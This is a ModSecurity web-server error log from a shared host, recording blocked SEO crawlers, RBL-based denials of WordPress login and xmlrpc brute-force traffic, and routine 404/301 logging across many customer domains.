[Tue May 26 17:38:25.126104 2026] [security2:error] [pid 912729:tid 912891] [client 114.119.141.34:42465] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "shirdisaibabatemple.org"] [uri "/saibaba-website-privacy.php"] [unique_id "ahWNOUoCupl_NMj3qz9-LgAAAKQ"], referer: https://shirdisaibabatemple.org/
[Tue May 26 17:38:25.179133 2026] [security2:error] [pid 912729:tid 912897] [client 158.140.167.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNOEoCupl_NMj3qz9-FgAAAKk"]
[Tue May 26 17:38:25.517303 2026] [security2:error] [pid 912729:tid 912984] [client 223.235.98.214:30140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNOUoCupl_NMj3qz9-PQAAAQA"]
[Tue May 26 17:38:25.517443 2026] [security2:error] [pid 912729:tid 912984] [client 223.235.98.214:30140] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNOUoCupl_NMj3qz9-PQAAAQA"]
[Tue May 26 17:38:25.599817 2026] [security2:error] [pid 912729:tid 912812] [remote 222.165.190.235:39050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNOUoCupl_NMj3qz9-OgABAlI"]
[Tue May 26 17:38:27.381990 2026] [security2:error] [pid 912729:tid 912979] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNOkoCupl_NMj3qz9-lQAAAPs"]
[Tue May 26 17:38:28.448750 2026] [security2:error] [pid 912729:tid 912917] [client 114.119.129.218:37571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/visiter/GPSCAppForm_MainExam.pdf"] [unique_id "ahWNPEoCupl_NMj3qz9-8gAAAL0"], referer: https://www.ucdc.co.in/upload/visiter/?C=M%3BO%3DA
[Tue May 26 17:38:28.972704 2026] [security2:error] [pid 912729:tid 912905] [client 43.165.67.31:39178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.67.165.43.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-signup.php"] [unique_id "ahWNPEoCupl_NMj3qz9_DQAAALE"], referer: http://www.rainadelproperties.com.taotechservices.com
[Tue May 26 17:38:29.385869 2026] [security2:error] [pid 912729:tid 912876] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNPEoCupl_NMj3qz9_EAAAAJY"]
[Tue May 26 17:38:30.731368 2026] [security2:error] [pid 912729:tid 912968] [client 198.244.168.94:39972] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodbalsa.com"] [uri "/robots.txt"] [unique_id "ahWNPkoCupl_NMj3qz9_eAAAAPA"]
[Tue May 26 17:38:30.731463 2026] [security2:error] [pid 912729:tid 912968] [client 198.244.168.94:39972] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodbalsa.com"] [uri "/robots.txt"] [unique_id "ahWNPkoCupl_NMj3qz9_eAAAAPA"]
[Tue May 26 17:38:31.294592 2026] [security2:error] [pid 912729:tid 912917] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNPkoCupl_NMj3qz9_fgAAAL0"]
[Tue May 26 17:38:32.076438 2026] [security2:error] [pid 912729:tid 912978] [client 85.208.96.203:28376] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWNQEoCupl_NMj3qz9_swAAAPo"]
[Tue May 26 17:38:32.076549 2026] [security2:error] [pid 912729:tid 912978] [client 85.208.96.203:28376] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWNQEoCupl_NMj3qz9_swAAAPo"]
[Tue May 26 17:38:32.084470 2026] [security2:error] [pid 912729:tid 912862] [client 148.113.128.168:20422] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "glorodbalsa.com"] [uri "/"] [unique_id "ahWNQEoCupl_NMj3qz9_tAAAAIg"]
[Tue May 26 17:38:32.084581 2026] [security2:error] [pid 912729:tid 912862] [client 148.113.128.168:20422] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "glorodbalsa.com"] [uri "/"] [unique_id "ahWNQEoCupl_NMj3qz9_tAAAAIg"]
[Tue May 26 17:38:35.210405 2026] [security2:error] [pid 912729:tid 912817] [remote 103.95.119.103:37386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWNQ0oCupl_NMj3qz-AXAAAuFc"]
[Tue May 26 17:38:35.956281 2026] [security2:error] [pid 912729:tid 912958] [client 223.235.98.214:8245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNQ0oCupl_NMj3qz-AkwAAAOY"]
[Tue May 26 17:38:35.956380 2026] [security2:error] [pid 912729:tid 912958] [client 223.235.98.214:8245] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNQ0oCupl_NMj3qz-AkwAAAOY"]
[Tue May 26 17:38:36.201838 2026] [security2:error] [pid 912729:tid 912907] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNQ0oCupl_NMj3qz-AhgAAALM"]
[Tue May 26 17:38:37.988603 2026] [security2:error] [pid 912729:tid 912868] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNRUoCupl_NMj3qz-A7AAAAI4"]
[Tue May 26 17:38:39.578035 2026] [security2:error] [pid 912729:tid 912884] [client 172.224.240.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWNRUoCupl_NMj3qz-A5gAAAJ4"]
[Tue May 26 17:38:40.940839 2026] [security2:error] [pid 912729:tid 912948] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNSEoCupl_NMj3qz-BjwAAANw"]
[Tue May 26 17:38:40.952507 2026] [security2:error] [pid 912729:tid 912958] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNSEoCupl_NMj3qz-BqQAAAOY"], referer: https://www.anujtradingco.com/
[Tue May 26 17:38:41.768730 2026] [security2:error] [pid 912729:tid 912903] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNSUoCupl_NMj3qz-B2AAAAK8"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1465899&moderation-hash=73104512d3088feb603366627e70274e
[Tue May 26 17:38:41.940300 2026] [security2:error] [pid 912729:tid 912882] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNSUoCupl_NMj3qz-BzgAAAJw"]
[Tue May 26 17:38:43.196364 2026] [security2:error] [pid 912729:tid 912859] [client 23.80.164.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWNS0oCupl_NMj3qz-CMwAAAIU"], referer: https://anujtradingco.com
[Tue May 26 17:38:44.943161 2026] [security2:error] [pid 912729:tid 912933] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNTEoCupl_NMj3qz-CfQAAAM0"]
[Tue May 26 17:38:46.465332 2026] [security2:error] [pid 912729:tid 912962] [client 223.235.98.214:28680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNTkoCupl_NMj3qz-C4wAAAOo"]
[Tue May 26 17:38:46.466075 2026] [security2:error] [pid 912729:tid 912962] [client 223.235.98.214:28680] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNTkoCupl_NMj3qz-C4wAAAOo"]
[Tue May 26 17:38:48.076239 2026] [security2:error] [pid 912729:tid 912911] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNT0oCupl_NMj3qz-DNQAAALc"]
[Tue May 26 17:38:48.251320 2026] [security2:error] [pid 912729:tid 912980] [client 3.79.134.69:30936] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWNUEoCupl_NMj3qz-DWwAAAPw"], referer: https://thegoodsporting.com
[Tue May 26 17:38:50.349609 2026] [security2:error] [pid 912729:tid 912957] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNUUoCupl_NMj3qz-DuAAAAOU"]
[Tue May 26 17:38:51.743939 2026] [security2:error] [pid 912729:tid 912880] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNU0oCupl_NMj3qz-EBQAAAJo"]
[Tue May 26 17:38:52.610741 2026] [security2:error] [pid 912729:tid 912900] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNVEoCupl_NMj3qz-EOgAAAKw"]
[Tue May 26 17:38:54.259645 2026] [security2:error] [pid 912729:tid 912897] [client 38.154.23.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWNVUoCupl_NMj3qz-ElgAAAKk"]
[Tue May 26 17:38:54.928278 2026] [security2:error] [pid 912729:tid 912896] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNVkoCupl_NMj3qz-EygAAAKg"]
[Tue May 26 17:38:56.641815 2026] [security2:error] [pid 912729:tid 912929] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNWEoCupl_NMj3qz-FLgAAAMk"]
[Tue May 26 17:38:56.965884 2026] [security2:error] [pid 912729:tid 912958] [client 113.169.79.143:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNWEoCupl_NMj3qz-FPQAAAOY"]
[Tue May 26 17:38:57.122231 2026] [security2:error] [pid 912729:tid 912969] [client 223.235.98.214:10280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNWEoCupl_NMj3qz-FWwAAAPE"]
[Tue May 26 17:38:57.122342 2026] [security2:error] [pid 912729:tid 912969] [client 223.235.98.214:10280] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNWEoCupl_NMj3qz-FWwAAAPE"]
[Tue May 26 17:38:59.536014 2026] [security2:error] [pid 912729:tid 912901] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNW0oCupl_NMj3qz-F1AAAAK0"]
[Tue May 26 17:39:01.887139 2026] [security2:error] [pid 912729:tid 912948] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNXUoCupl_NMj3qz-GVQAAANw"]
[Tue May 26 17:39:03.885161 2026] [security2:error] [pid 912729:tid 912891] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNX0oCupl_NMj3qz-GuwAAAKQ"]
[Tue May 26 17:39:05.435599 2026] [security2:error] [pid 912729:tid 912898] [client 193.37.33.117:27275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 117.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWNYUoCupl_NMj3qz-HHwAAAKo"]
[Tue May 26 17:39:06.725465 2026] [security2:error] [pid 912729:tid 912967] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNYkoCupl_NMj3qz-HWAAAAO8"]
[Tue May 26 17:39:07.385720 2026] [security2:error] [pid 912729:tid 912959] [client 54.39.89.153:44262] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWNY0oCupl_NMj3qz-HnQAAAOc"]
[Tue May 26 17:39:07.385867 2026] [security2:error] [pid 912729:tid 912959] [client 54.39.89.153:44262] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWNY0oCupl_NMj3qz-HnQAAAOc"]
[Tue May 26 17:39:07.512268 2026] [security2:error] [pid 912729:tid 912883] [client 223.235.98.214:24468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNY0oCupl_NMj3qz-HpAAAAJ0"]
[Tue May 26 17:39:07.512489 2026] [security2:error] [pid 912729:tid 912883] [client 223.235.98.214:24468] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNY0oCupl_NMj3qz-HpAAAAJ0"]
[Tue May 26 17:39:08.419939 2026] [security2:error] [pid 912729:tid 912922] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNY0oCupl_NMj3qz-HxgAAAMI"]
[Tue May 26 17:39:08.754767 2026] [security2:error] [pid 912729:tid 912958] [client 15.235.27.241:28928] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "ghanemgh.com"] [uri "/"] [unique_id "ahWNZEoCupl_NMj3qz-H7wAAAOY"]
[Tue May 26 17:39:08.754884 2026] [security2:error] [pid 912729:tid 912958] [client 15.235.27.241:28928] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/"] [unique_id "ahWNZEoCupl_NMj3qz-H7wAAAOY"]
[Tue May 26 17:39:11.247184 2026] [security2:error] [pid 912729:tid 912882] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNZkoCupl_NMj3qz-IagAAAJw"]
[Tue May 26 17:39:12.791663 2026] [security2:error] [pid 912729:tid 912974] [client 114.119.157.183:51353] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/marlin-22-fully-automatic.html"] [unique_id "ahWNaEoCupl_NMj3qz-I8QAAAPY"], referer: https://whitesun.in/1hfq/marlin-22-fully-automatic.html
[Tue May 26 17:39:12.910870 2026] [security2:error] [pid 912729:tid 912949] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNaEoCupl_NMj3qz-I2gAAAN0"]
[Tue May 26 17:39:13.742180 2026] [security2:error] [pid 912729:tid 912889] [client 198.235.24.33:60716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bosscoirs.freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNZ0oCupl_NMj3qz-ImwAAAKI"]
[Tue May 26 17:39:15.508998 2026] [security2:error] [pid 912729:tid 912971] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNa0oCupl_NMj3qz-JdQAAAPM"]
[Tue May 26 17:39:17.959908 2026] [security2:error] [pid 912729:tid 912921] [client 223.235.98.214:24865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNbUoCupl_NMj3qz-KHgAAAME"]
[Tue May 26 17:39:17.960182 2026] [security2:error] [pid 912729:tid 912921] [client 223.235.98.214:24865] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNbUoCupl_NMj3qz-KHgAAAME"]
[Tue May 26 17:39:18.796180 2026] [security2:error] [pid 912729:tid 912892] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNbkoCupl_NMj3qz-KQAAAAKU"]
[Tue May 26 17:39:19.195376 2026] [security2:error] [pid 912729:tid 912945] [client 167.235.143.113:34260] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWNbkoCupl_NMj3qz-KUgAAANk"], referer: http://ucdc.co.in/
[Tue May 26 17:39:20.976555 2026] [security2:error] [pid 912729:tid 912909] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNcEoCupl_NMj3qz-KwAAAALU"]
